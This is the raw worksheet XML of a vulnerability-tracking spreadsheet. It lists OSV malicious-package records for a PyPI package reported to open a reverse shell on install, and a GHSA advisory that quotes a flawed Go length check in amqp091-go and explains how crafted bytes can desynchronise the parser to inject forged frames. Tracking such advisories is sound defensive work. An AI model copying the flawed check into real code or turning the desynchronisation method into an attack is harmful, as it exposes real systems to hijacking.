During installation, package starts a reverse shell.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-requests-triwes
Reasons (based on the campaign):
 - The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="T1065" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16274</t>
        </is>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1066" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1066" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16275</t>
        </is>
      </c>
      <c r="D1066" s="5" t="inlineStr"/>
      <c r="E1066" s="5" t="inlineStr"/>
      <c r="F1066" s="5" t="inlineStr"/>
      <c r="G1066" s="5" t="inlineStr"/>
      <c r="H1066" s="5" t="inlineStr"/>
      <c r="I1066" s="5" t="inlineStr"/>
      <c r="J1066" s="5" t="inlineStr"/>
      <c r="K1066" s="5" t="inlineStr"/>
      <c r="L1066" s="5" t="inlineStr">
        <is>
          <t>PyPI:requests-triwes</t>
        </is>
      </c>
      <c r="M1066" s="5" t="inlineStr"/>
      <c r="N1066" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1066" s="5" t="inlineStr"/>
      <c r="R1066" s="5" t="inlineStr"/>
      <c r="S1066" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (fa01be0759de95b7a1628930718f7b3bf372eff0c777aace419196e327e77078)
During installation, package starts a reverse shell.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-requests-triwes
Reasons (based on the campaign):
 - The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="T1066" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16275</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T1066"/>
  <conditionalFormatting sqref="E2:E106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06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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T868" r:id="rId867"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T869" r:id="rId868"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T870" r:id="rId869"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T871" r:id="rId870"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T872" r:id="rId871"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T873" r:id="rId872"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T874" r:id="rId873"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T875" r:id="rId874"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T876" r:id="rId875"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T877" r:id="rId876"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T878" r:id="rId877"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T879" r:id="rId878"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T880" r:id="rId879"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T881" r:id="rId880"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T882" r:id="rId881"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T883" r:id="rId882"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T884" r:id="rId883"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T885" r:id="rId884"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T886" r:id="rId885"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T887" r:id="rId886"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T888" r:id="rId887"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T889" r:id="rId888"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T890" r:id="rId889"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T891" r:id="rId890"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T892" r:id="rId891"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T893" r:id="rId892"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T894" r:id="rId893"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T895" r:id="rId894"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T896" r:id="rId895"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T897" r:id="rId896"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T898" r:id="rId897"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T899" r:id="rId898"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T900" r:id="rId899"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T901" r:id="rId900"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T902" r:id="rId901"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T903" r:id="rId902"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T904" r:id="rId903"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T905" r:id="rId904"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T906" r:id="rId905"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T907" r:id="rId906"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T908" r:id="rId907"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T909" r:id="rId908"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T910" r:id="rId909"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T911" r:id="rId910"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T912" r:id="rId911"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T913" r:id="rId912"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T914" r:id="rId913"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T915" r:id="rId914"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T916" r:id="rId915"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T917" r:id="rId916"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T918" r:id="rId917"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T919" r:id="rId918"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T920" r:id="rId919"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T921" r:id="rId920"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T922" r:id="rId921"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T923" r:id="rId922"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T924" r:id="rId923"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T925" r:id="rId924"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T926" r:id="rId925"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T927" r:id="rId926"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T928" r:id="rId927"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T929" r:id="rId928"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T930" r:id="rId929"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T931" r:id="rId930"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T932" r:id="rId931"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T933" r:id="rId932"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T934" r:id="rId933"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T935" r:id="rId934"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T936" r:id="rId935"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T937" r:id="rId936"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T938" r:id="rId937"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T939" r:id="rId938"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T940" r:id="rId939"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T941" r:id="rId940"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T942" r:id="rId941"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T943" r:id="rId942"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T944" r:id="rId943"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T945" r:id="rId944"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T946" r:id="rId945"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T947" r:id="rId946"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T948" r:id="rId947"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T949" r:id="rId948"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T950" r:id="rId949"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T951" r:id="rId950"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T952" r:id="rId951"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T953" r:id="rId952"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T954" r:id="rId953"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T955" r:id="rId954"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T956" r:id="rId955"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T957" r:id="rId956"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T958" r:id="rId957"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T959" r:id="rId958"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T960" r:id="rId959"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T961" r:id="rId960"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T962" r:id="rId961"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T963" r:id="rId962"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T964" r:id="rId963"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T965" r:id="rId964"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T966" r:id="rId965"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T967" r:id="rId966"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T968" r:id="rId967"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T969" r:id="rId968"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T970" r:id="rId969"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T971" r:id="rId970"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T972" r:id="rId971"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T973" r:id="rId972"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T974" r:id="rId973"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T975" r:id="rId974"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T976" r:id="rId975"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T977" r:id="rId976"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T978" r:id="rId977"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T979" r:id="rId978"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T980" r:id="rId979"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T981" r:id="rId980"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T982" r:id="rId981"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T983" r:id="rId982"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T984" r:id="rId983"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T985" r:id="rId984"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T986" r:id="rId985"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T987" r:id="rId986"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T988" r:id="rId987"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T989" r:id="rId988"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T990" r:id="rId989"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T991" r:id="rId990"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T992" r:id="rId991"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T993" r:id="rId992"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T994" r:id="rId993"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T995" r:id="rId994"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T996" r:id="rId995"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T997" r:id="rId996"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T998" r:id="rId997"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T999" r:id="rId998"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1000" r:id="rId999"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1001" r:id="rId1000"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1002" r:id="rId1001"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1003" r:id="rId1002"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1004" r:id="rId1003"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1005" r:id="rId1004"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1006" r:id="rId1005"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1007" r:id="rId1006"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1008" r:id="rId1007"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1009" r:id="rId1008"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1010" r:id="rId1009"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1011" r:id="rId1010"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1012" r:id="rId1011"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1013" r:id="rId1012"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1014" r:id="rId1013"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1015" r:id="rId1014"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1016" r:id="rId1015"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1017" r:id="rId1016"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1018" r:id="rId1017"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1019" r:id="rId1018"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1020" r:id="rId1019"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1021" r:id="rId1020"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1022" r:id="rId1021"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1023" r:id="rId1022"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1024" r:id="rId1023"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1025" r:id="rId1024"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1026" r:id="rId1025"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1027" r:id="rId1026"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1028" r:id="rId1027"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1029" r:id="rId1028"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1030" r:id="rId1029"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1031" r:id="rId1030"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1032" r:id="rId1031"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1033" r:id="rId1032"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1034" r:id="rId1033"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1035" r:id="rId1034"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1036" r:id="rId1035"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1037" r:id="rId1036"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1038" r:id="rId1037"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1039" r:id="rId1038"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1040" r:id="rId1039"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1041" r:id="rId1040"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1042" r:id="rId1041"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1043" r:id="rId1042"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1044" r:id="rId1043"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1045" r:id="rId1044"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1046" r:id="rId1045"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1047" r:id="rId1046"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1048" r:id="rId1047"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1049" r:id="rId1048"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1050" r:id="rId1049"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1051" r:id="rId1050"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1052" r:id="rId1051"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1053" r:id="rId1052"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1054" r:id="rId1053"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1055" r:id="rId1054"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1056" r:id="rId1055"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1057" r:id="rId1056"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1058" r:id="rId1057"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1059" r:id="rId1058"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1060" r:id="rId1059"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1061" r:id="rId1060"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1062" r:id="rId1061"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1063" r:id="rId1062"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1064" r:id="rId1063"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1065" r:id="rId1064"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1066" r:id="rId10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Fix/version updated</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77411</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M2" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr"/>
      <c r="P2" s="5" t="inlineStr"/>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>**Summary**
A critical stream desynchronization vulnerability has been identified in the AMQP wire-protocol parser. When parsing a long string (`readLongstr`) within a table field, providing a length that exceeds the maximum signed 32-bit integer (`2^31 - 1`, or roughly `2.1` GiB) triggers an improper error-handling condition. The parser abruptly aborts the read and returns a success status (`"",nil`) without consuming the specified bytes from the underlying network buffer. This causes all subsequent read operations to become misaligned. The parser interprets arbitrary offsets within the remaining payload bytes as valid AMQP frame headers, leading to potential Remote Code Execution (RCE), data injection, or complete connection hijacking.
**Vulnerability Details**
The vulnerability exists within the bounds-checking logic of the readLongstr function:
```go
// read.go:113-114 — silent no-op return, bytes left in stream
if length &gt; (^uint32(0) &gt;&gt; 1) {
    return  // returns "", nil, does NOT consume `length` bytes
}
```
When `length` evaluates to a value greater than `0x7FFFFFFF`:
1. The function executes a silent `return` statement.
2. Because Go utilizes named or zero-value initialization for unassigned return registers, this yields `"", nil` (indicating a successful read of an empty string).
3. The Critical Failure: The reader's cursor is not advanced by `length` bytes. The malformed payload remains sitting in the TCP/buffer stream.
**Impact**
As `readTable` continues iterating over the stream under the assumption that the string was successfully parsed, the byte alignment is entirely broken.
- Parser Desynchronization: Future AMQP frame headers are read from arbitrary offsets inside the attacker-controlled message payload.
- Payload Reinterpretation: A malicious actor can carefully craft the trailing bytes of the initial payload to perfectly mimic valid AMQP frames (e.g., `connection.close`, `channel.open`, or message publishing frames), forcing the client/server to execute unintended actions.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77411</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77405</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr">
